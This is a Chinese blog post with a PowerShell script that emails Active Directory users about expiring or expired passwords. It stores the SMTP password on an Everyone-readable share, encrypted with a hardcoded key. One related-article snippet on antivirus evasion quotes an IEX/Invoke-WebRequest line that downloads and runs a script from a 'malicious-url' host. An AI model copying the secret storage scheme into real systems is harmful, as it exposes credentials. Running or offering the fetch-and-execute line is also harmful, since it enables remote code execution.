AD账号密码过期邮件提醒-powershell实现--密码加密(新增)

最新推荐文章于 2022-10-17 14:51:36 发布
最新推荐文章于 2022-10-17 14:51:36 发布
阅读量7k 收藏 7
点赞数
分类专栏: windows操作系统学习记录 文章标签: powershell 密码过期提醒 域账户 邮件发送
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxm425/article/details/78733010
版权

加密部分参考:http://www.bubuko.com/infodetail-1846894.html


首先将在某台主机上上建立一个share folder,设置权限为Everyone读取,里面将存储加密后的密码文件,文件命名为Password.txt。

新建一个加密的powershell文件,内容如下:用于把密码加密存储至Password.txt

 

 

$File = "\\SHSV2018\SharePath\Password.txt"
[Byte[]] $key = (1..16)
$Password = "P@ssword" | ConvertTo-SecureString -AsPlainText -Force
$Password | ConvertFrom-SecureString -key $key | Out-File $File
 然后我们就可以直接在所需要调用密码的地方读取Password.txt,具体参见标红的部分 

 


 
 

#leader的需求是,AD密码过期15天之前通过邮件通知用户,告知还有多少天密码就要过期了
 

#由于不是特别熟悉powershell,所以会写的比较笨,不过功能是实现了
 

#我们设置的是用户密码90天就过期
 

 

$File = "\\SHSV2018\SharePath\Password.txt"
[Byte[]] $key = (1..16)
$smtpPassword=Get-Content $File | ConvertTo-SecureString -Key $key
 $user=Get-ADUser -searchbase 'OU=XX,DC=XX,DC=XX,DC=XX' -Filter * -Properties * |Select-Object displayname,passwordlastset,mail #这边的ou和DC填自己的,获取域账户所需的信息 

 $today=Get-Date #获取今天的日期 

 $today_75=$today.AddDays(-75) #获取75天的日期 

 $today_90=$today.AddDays(-90) #获取90天的日期 

 $Mailtouser=$user |Where-Object {$_.passwordlastset -le $today_75 -and $_.passwordlastset -ge $today_90 -and $_.passwordlastset -gt 0 -and $_.displayname -ne 'user1' -and $_.displayname -ne 'user2'} #获取需要邮件通知的用户,通过过期时间排除,其中也排除了user1和user2这样的特殊用户 

 $Mailusernum=$Mailtouser.Count #这样账户的总数 

 $MailtoAddress=$Mailtouser.mail #这些账户的mail邮箱 

 $Mailtouser_ed=$user |Where-Object {$_.passwordlastset -lt $today_90  -and $_.passwordlastset -gt 0 -and $_.displayname -ne 'user1' -and $_.displayname -ne 'user2'} #这是获取已经过期了的账户,其中也排除了user1和user2这样的特殊用户 

 $Mailusernum_ed=$Mailtouser_ed.Count #这样账户的总数 

 $MailtoAddress_ed=$Mailtouser_ed.mail #这些账户的mail邮箱 

 $smtpServer="smtp.exmail.qq.com" #你的smtp服务器,楼主的是qq 

 $smtpUser="xxx@qq.com" #账户 

 
#$smtpPassword="password"#密码 注释掉  

 $mail=New-Object System.Net.Mail.MailMessage 

 $MailAddress="xxx@qq.com" #发件人地址 

 $mail.From=New-Object System.Net.Mail.MailAddress($MailAddress) 

 $mail.Subject="主题" 

 $smtp=New-Object System.Net.Mail.SmtpClient -ArgumentList $smtpServer 

 $smtp.Credentials=New-Object System.Net.NetworkCredential -ArgumentList $smtpUser,$smtpPassword 

 for ($i=0;$i -lt $Mailusernum;$i++) #循环并发送邮件----还有多少天过期 

 { 

 $mail.To.Add($MailtoAddress[$i]) 

 $days_array=((New-TimeSpan $Mailtouser.passwordlastset[$i] -end $today_75).Days) #获取还有多少天过期 

 $mail.Body="你的密码还有$days_array 天过期了" 

 $smtp.Send($mail) #发送邮件 

 $mail.To.Clear() 

 

}
 


 
 for ($i=0;$i -lt $Mailusernum_ed;$i++) #循环并发送邮件----已经过期多少天了 

 { 

 $mail.To.Add($MailtoAddress_ed[$i]) 

 $days_array=((New-TimeSpan $Mailtouser_ed.passwordlastset[$i] -end $today_90).Days)#获取你过期多少天了 

 $mail.Body="你的密码已经过期 $days_array 天了" 

 $smtp.Send($mail) 

 $mail.To.Clear() 

 } 

 


                

        

        

    

  


    

      

        

            

              
                
                  zxm425
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
AD密码过期邮件提醒

				
			

			

				

					01-08
				

			

		

		

			
				
AD密码过期邮件提醒,在计算机设置帐号密码过期将自动发邮件通知用户,在任务计划添加定时任务,使用bat脚本再调用powshell脚本。bate脚本内容powershell "D:\script\jbo.ps1

			
		

	



                

              
                



	

		

			

				
					
powershell免杀详解

					
最新发布

				
			

			

				

					m0_57836225的博客
				

				

					08-20
					
					923
					
				

			

		

		

			
				
也可以使用 `IEX (Invoke-WebRequest -Uri 'http://malicious-url/script.txt' -UseBasicParsing).Content`,通过 `Invoke-WebRequest`获取远程脚本内容并执行。- 解释:PowerShell 模块是一种组织和封装 PowerShell 代码的方式,`.psm1`文件包含函数、变量、别名等,可以将一组相关的功能打包在一起,以便在多个脚本中重复使用,提高代码的可维护性和可重用性。

			
		

	



                


  
              

                


	

		

			

				
					
计算机用户密码过期,PowerShell 检测用户密码过期时间

				
			

			

				

					weixin_42501161的博客
				

				

					06-23
					
					2265
					
				

			

		

		

			
				
环境 AD 服务器 Windows 2012 R2,Exchange首先定制脚本,本脚本是参考网上一些资料然后进行改良的,3000用户执行约1分钟。参考文章 http://lixiaosong.blog.51cto.com/705126/1409113/这篇文章中的脚本如果直接放里执行肯定会有问题,还有就是它的效率很低。因为它在循环语句中多次执行 Get-ADUser,每执行一次必消耗额定...

			
		

	





	

		

			

				
					
账号策略设置(密码有效期,密码复杂度等)

					
热门推荐

				
			

			

				

					qq_43091539的博客
				

				

					09-26
					
					1万+
					
				

			

		

		

			
				
账号策略设置(密码有效期,密码复杂度等)

			
		

	



		

			
		



	

		

			

				
					
Powshell 邮件提醒密码即将到期用户

				
			

			

				

					lzbill的专栏
				

				

					12-02
					
					676
					
				

			

		

		

			
				
Powshell 邮件提醒密码即将到期用户用户选出来,逐个发邮件提醒。


#使用AD模块
Import-Module Activedirectory

#过期前10天提醒过期不再提醒
$WarningDate=(Get-Date).AddDays(-170)
$GiveupDate=(Get-Date).AddDays(-180)

#过滤:账号有效,非长效密码,有邮箱
$FilterUser=Get-Aduser -searchbase "OU=分公司,OU=总公司,DC=domain,...

			
		

	





	

		

			

				
					
node-powershell:从您的NodeJS应用轻松运行PowerShell

				
			

			

				

					05-02
				

			

		

		

			
				
节点-PowerShell Node-PowerShell利用当今技术世界中存在的两个最简单,有效和简便的工具。 一方面, 在javascript领掀起了一场革命,另一方面, 最近推出了最初的开源,跨平台版本,并将它们连接在一起,使您能够...

			
		

	





	

		

			

				
					
powershell实现用户密码到期邮件提醒功能

				
			

			

				

					09-13
				

			

		

		

			
				
说明:服务器为windows server 2012 r2 std 中文版 此服务器只是DC,无其它功能。powershell实现用户密码到期邮件提醒功能

			
		

	





	

		

			

				
					
selenium-powershell:用于运行Selenium WebDriver的PowerShell模块

				
			

			

				

					05-07
				

			

		

		

			
				
Selenium PowerShell模块 Selenium PowerShell模块允许您使用自动执行浏览器交互。 您可以导航到页面,查找元素,单击按钮,输入文本,甚至拍摄屏幕截图。 寻找维护者 我一直无法跟上此仓库中的问题。 如果您有兴趣...

			
		

	





	

		

			

				
					
dnscat2-powershell:dnscat2的Powershell客户端,加密的DNS命令和控制工具

				
			

			

				

					02-06
				

			

		

		

			
				
"dnscat2-powershell-master"很可能包含了dnscat2-powershell的源代码和所有必要的组件,如客户端脚本、服务器端配置以及可能的文档和示例。用户可以在这个文件夹中找到如何编译、安装和使用这个工具的说明。  总结...

			
		

	





	

		

			

				
					
exchange邮件提醒密码到期

				
			

			

				

					02-25
				

			

		

		

			
				
邮件的方式,提醒用户密码到期修改,方便快捷,而且可以给管理员发送邮件汇总。

			
		

	





	

		

			

				
					
AD账号属性的 PwdLastSet 和 PasswordLastSet 有什么区别?

				
			

			

				

					lzbill的专栏
				

				

					11-27
					
					2821
					
				

			

		

		

			
				
AD账号属性的 PwdLastSet 和 PasswordLastSet 有什么区别?



两个都是最后一次设置密码的时间,但有点区别。

pwdLastSet

pwdLastSet 是时间戳,使用起来不太直观,但参与运算是没问题的:


D:> Get-ADUser -Filter 'Name -like "kj*"' -Properties * | Select-Object name,pwdlastset

name          pwdlastset
----          --.

			
		

	





	

		

			

				
					
「运维有小邓」Active Directory 密码过期通知功能

				
			

			

				

					运维有小邓
				

				

					06-28
					
					630
					
				

			

		

		

			
				
卓豪ManageEngine的ADSelfService Plus就是这样一款AD用户密码自助管理工具,员工自己即可通过它对自己的账户密码进行修改或重置。

			
		

	





	

		

			

				
					
如何让AD用户密码在快过期时,发邮件提醒用户更改密码

				
			

			

				

					shv283fi
				

				

					01-15
					
					1718
					
				

			

		

		

			
				

如何让AD用户密码在快过期时,发邮件提醒用户更改密码 
2011年04月29日
  本文转自www.5dmail.net
  大家都知道,在环境中,组策略中可以设置当用户密码过期时,电脑登录会有提示,但当用户出差,或是用OWA方式访问时,并不会收到相关提示,而导致道密码过期而无法收发邮件!
  下面的方法,就是教大家,如何让用户密码在快过期时,发邮件提醒用户更改密码,让用户去OWA...

			
		

	





	

		

			

				
					
获取AD中即将过期账号并邮件通知

				
			

			

				

					Young的博客
				

				

					09-06
					
					4283
					
				

			

		

		

			
				
简单一个脚本解决Exchange邮箱密码过期提醒问题。

			
		

	





	

		

			

				
					
通过企业微信,向AD过期用户发送更改密码提醒

				
			

			

				

					项小娃的博客
				

				

					08-11
					
					3072
					
				

			

		

		

			
				
1、连接AD的LDAP,对中固定范围的所有用户进行递归查询,并获取范围内所有用户的相应信息2、有些应用有一个可信ip的设置功能,有些没有,我估计是企业微信改版了,老的应用没有,新创建的应用会有,如果有的话并且代码执行时报出ip不可信的错误,可以尝试设置一下应用中的可信ip。3、使用企业微信提供的通过邮箱查找用户ID的API,通过邮箱查找企业微信中该用户对应的企业微信ID。4、通过ID向用户发送消息提醒......

			
		

	





	

		

			

				
					
「运维有小邓」AD密码到期通知工具

				
			

			

				

					运维有小邓
				

				

					06-01
					
					1015
					
				

			

		

		

			
				
ADSelfService Plus(密码自助服务软件)的一个重要组件,就是密码到期通知功能,查找Active Directory并找出密码即将到期的用户帐户,并向帐户所有者发电子邮件通知,建议其更改密码

			
		

	





	

		

			

				
					
AD帐户密码过期,终端802.1x认证自动重连导致AD账号被锁,员工无法上网、办公怎么办?

				
			

			

				

					yuzijiang11111的博客
				

				

					10-17
					
					2788
					
				

			

		

		

			
				
不少企业搭建了AD之后,会遇到账户密码被修改或过期后,终端802.1x认证自动重连,导致账号被锁定,员工无法上网,无法办公的情况。通过宁盾有线无线网络认证方案,802.1x自助改密功能,能解决这类问题,提高用户体验和运维效率。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 4

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值